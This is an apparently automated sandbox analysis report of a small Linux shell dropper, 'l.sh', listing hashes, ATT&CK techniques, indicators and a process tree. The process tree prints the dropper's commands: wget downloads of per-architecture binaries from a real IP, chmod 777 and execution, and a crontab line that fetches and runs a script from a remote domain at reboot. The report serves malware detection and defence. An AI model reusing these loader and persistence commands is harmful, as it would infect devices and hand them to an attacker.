6f6de7f166f98d6391f52362327abeae69469b3dd8e09db11c11615a2c5cb31f

Analysis

max time kernel
140s
max time network
145s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
01-01-2025 16:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

l.sh
Size

240B
MD5

e2102b077fa0da3be5a5b07b22a34d20
SHA1

629a840f9cbd82d8126f2e6b26f4668af8757f10
SHA256

6f6de7f166f98d6391f52362327abeae69469b3dd8e09db11c11615a2c5cb31f
SHA512

3db852f800118e0a6343e3d121db6eeb851ae72856ec4e7b07edb665e151811b2b6435706795370550cdeaf8b9816b64d42e6c317a1b6c781660905876873fdf

Score

7^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 9 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
835	chmod
740	chmod
790	chmod
801	chmod
832	chmod
744	chmod
760	chmod
805	chmod
807	sh

Executes dropped EXE 8 IoCs

ioc	pid	Process
/tmp/upnp	741	upnp
/tmp/upnp	745	upnp
/tmp/upnp	761	upnp
/tmp/upnp	791	upnp
/tmp/upnp	802	upnp
/tmp/upnp	806	upnp
/tmp/upnp	833	upnp
/tmp/upnp	836	upnp

Renames itself 1 IoCs

pid	Process
806	upnp

Unexpected DNS network traffic destination 2 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	139.84.165.176
Destination IP	80.152.203.134

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.qyvum9	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	/bin/sh /etc/init.d/rcS	806	upnp

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/812/cmdline	upnp
File opened for reading	/proc/1/stat	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/127/cmdline	killall
File opened for reading	/proc/361/stat	killall
File opened for reading	/proc/702/stat	killall
File opened for reading	/proc/702/cmdline	killall
File opened for reading	/proc/826/status	upnp
File opened for reading	/proc/2/stat	killall
File opened for reading	/proc/7/stat	killall
File opened for reading	/proc/76/stat	killall
File opened for reading	/proc/84/stat	killall
File opened for reading	/proc/676/stat	killall
File opened for reading	/proc/mounts	upnp
File opened for reading	/proc/824/status	upnp
File opened for reading	/proc/827/status	upnp
File opened for reading	/proc/2/cmdline	upnp
File opened for reading	/proc/6/stat	killall
File opened for reading	/proc/18/stat	killall
File opened for reading	/proc/72/stat	killall
File opened for reading	/proc/75/stat	killall
File opened for reading	/proc/708/stat	killall
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/832/status	upnp
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/71/stat	killall
File opened for reading	/proc/filesystems	killall
File opened for reading	/proc/11/stat	killall
File opened for reading	/proc/703/stat	killall
File opened for reading	/proc/714/stat	killall
File opened for reading	/proc/714/cmdline	killall
File opened for reading	/proc/831/status	upnp
File opened for reading	/proc/840/cmdline	upnp
File opened for reading	/proc/12/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/77/stat	killall
File opened for reading	/proc/381/stat	killall
File opened for reading	/proc/386/stat	killall
File opened for reading	/proc/703/cmdline	killall
File opened for reading	/proc/836/status	upnp
File opened for reading	/proc/823/status	upnp
File opened for reading	/proc/9/stat	killall
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/327/stat	killall
File opened for reading	/proc/359/stat	killall
File opened for reading	/proc/680/stat	killall
File opened for reading	/proc/681/stat	killall
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/841/status	upnp
File opened for reading	/proc/5/stat	killall
File opened for reading	/proc/110/stat	killall
File opened for reading	/proc/155/stat	killall
File opened for reading	/proc/245/stat	killall
File opened for reading	/proc/830/status	upnp
File opened for reading	/proc/833/status	upnp
File opened for reading	/proc/837/status	upnp
File opened for reading	/proc/20/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/155/cmdline	killall
File opened for reading	/proc/672/stat	killall
File opened for reading	/proc/709/stat	killall
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/14/stat	killall

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
794	wget
802	upnp

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/upnp	l.sh

/tmp/l.sh
/tmp/l.sh
1⤵
- Writes file to tmp directory
PID:711
- /usr/bin/killall
  killall -9 dvrLocker
  2⤵
  - Reads runtime system information
  PID:713
- /bin/rm
  rm -rf upnp
  2⤵
  PID:716
- /usr/bin/wget
  wget http://103.188.82.218/t/arm -O -
  2⤵
  PID:718
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/upnp
  ./upnp tplink.arm
  2⤵
  - Executes dropped EXE
  PID:741
- /usr/bin/wget
  wget http://103.188.82.218/t/arm5 -O -
  2⤵
  PID:743
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/upnp
  ./upnp tplink.arm5
  2⤵
  - Executes dropped EXE
  PID:745
- /usr/bin/wget
  wget http://103.188.82.218/t/arm6 -O -
  2⤵
  PID:747
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:760
- /tmp/upnp
  ./upnp tplink.arm6
  2⤵
  - Executes dropped EXE
  PID:761
- /usr/bin/wget
  wget http://103.188.82.218/t/arm7 -O -
  2⤵
  PID:764
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:790
- /tmp/upnp
  ./upnp tplink.arm7
  2⤵
  - Executes dropped EXE
  PID:791
- /usr/bin/wget
  wget http://103.188.82.218/t/mips -O -
  2⤵
  - System Network Configuration Discovery
  PID:794
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:801
- /tmp/upnp
  ./upnp tplink.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:802
- /usr/bin/wget
  wget http://103.188.82.218/t/mpsl -O -
  2⤵
  PID:804
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:805
- /tmp/upnp
  ./upnp tplink.mpsl
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Changes its process name
  - Reads runtime system information
  PID:806
- - /bin/sh
    sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    3⤵
    - File and Directory Permissions Modification
    PID:807
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:809
  - - /usr/bin/crontab
      crontab -l
      4⤵
      Reads runtime system information
      PID:810
- /usr/bin/wget
  wget http://103.188.82.218/t/ppc -O -
  2⤵
  PID:816
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:832
- /tmp/upnp
  ./upnp tplink.ppc
  2⤵
  - Executes dropped EXE
  PID:833
- /usr/bin/wget
  wget http://103.188.82.218/t/x86 -O -
  2⤵
  PID:834
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /tmp/upnp
  ./upnp tplink.x86
  2⤵
  - Executes dropped EXE
  PID:836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/upnp

Filesize
77KB

MD5
d09db60a70d5b53b5b53ad39476fd7e8

SHA1
73a75e5e8200f77d857a7256cc0979077e29241d

SHA256
36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165

SHA512
ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

Download Submit
/tmp/upnp

Filesize
73KB

MD5
f812a7b3a877f717eb6e54b843b41848

SHA1
21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25

SHA256
9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560

SHA512
c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732

Download Submit
/tmp/upnp

Filesize
85KB

MD5
d8b9115310ca0429f6ec2473696156a2

SHA1
5497d765ad0b6ad6ed2204338faecd9671f6a60c

SHA256
7f089801a37f1d9a83a5103c8f9b1c6fc00f9ce699cb812cc23704aea8d46c8c

SHA512
a3adc2f2a36bdf40bda9e592f03bf51c3a3e7954fbeb8e52d1517537c72efc7df2d22e8be0d1ac85b768aacb45bd77cabb0ced0885ac96c17252b8af63cdb664

Download Submit
/tmp/upnp

Filesize
102KB

MD5
45c898246a8ffe0b7cc20fe25669da04

SHA1
5ae935186b80f6beb84926d57337d5c0b9e3e1fc

SHA256
1b0846e58fbb6a0e72d25edb81ec94961c0c7048a4e6f26876660f5a26675c77

SHA512
ca75fb8ae0aa7977132c2888ff226f712f4e66f542ab121bcffdc3b3a912b906870b55d6415dfc60c133574739a71c1e5177418dd275d208f43d6ffc09c14636

Download Submit
/tmp/upnp

Filesize
99KB

MD5
559f129d380ad1cfb60792c6b2dc3d32

SHA1
3997a0fc0bd5958783f1751364ec407c5b170adc

SHA256
fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d

SHA512
9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

Download Submit
/tmp/upnp

Filesize
100KB

MD5
de6ef4e554d7fc17efc20fabafe82de8

SHA1
eca13ec698bed4ccde75e459d9267e68cbf874e9

SHA256
9fe5e0525979f5bbff9354895b7299f0ee4a2bad41877636a71fcafaae283ec0

SHA512
2e05e623b1ed416af7dfd115daef34ad5c1a4d334a267a84900998f2c58c577e0cca3b55c5f2acc7074b6f3f957a8999d70864875d5d0534d0c28f33c97f847e

Download Submit
/var/spool/cron/crontabs/tmp.qyvum9

Filesize
306B

MD5
b920c0200766483a783615a896ab3b61

SHA1
5e762f4d4db06109d529f2b20d04e8cfb65f281b

SHA256
40155d962e0e6573a9a428d16b5e81f122ec3c4f524c9fcfd67117df0c4358e5

SHA512
1003e28f46bc7385c4ba682a20f30fddaf07eed8faa59f934df65ea846ad8b1b872ab1289a3fe18e43331fddc5e6fe68cb40880479e7b5cca6ab55924d72ff8c

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads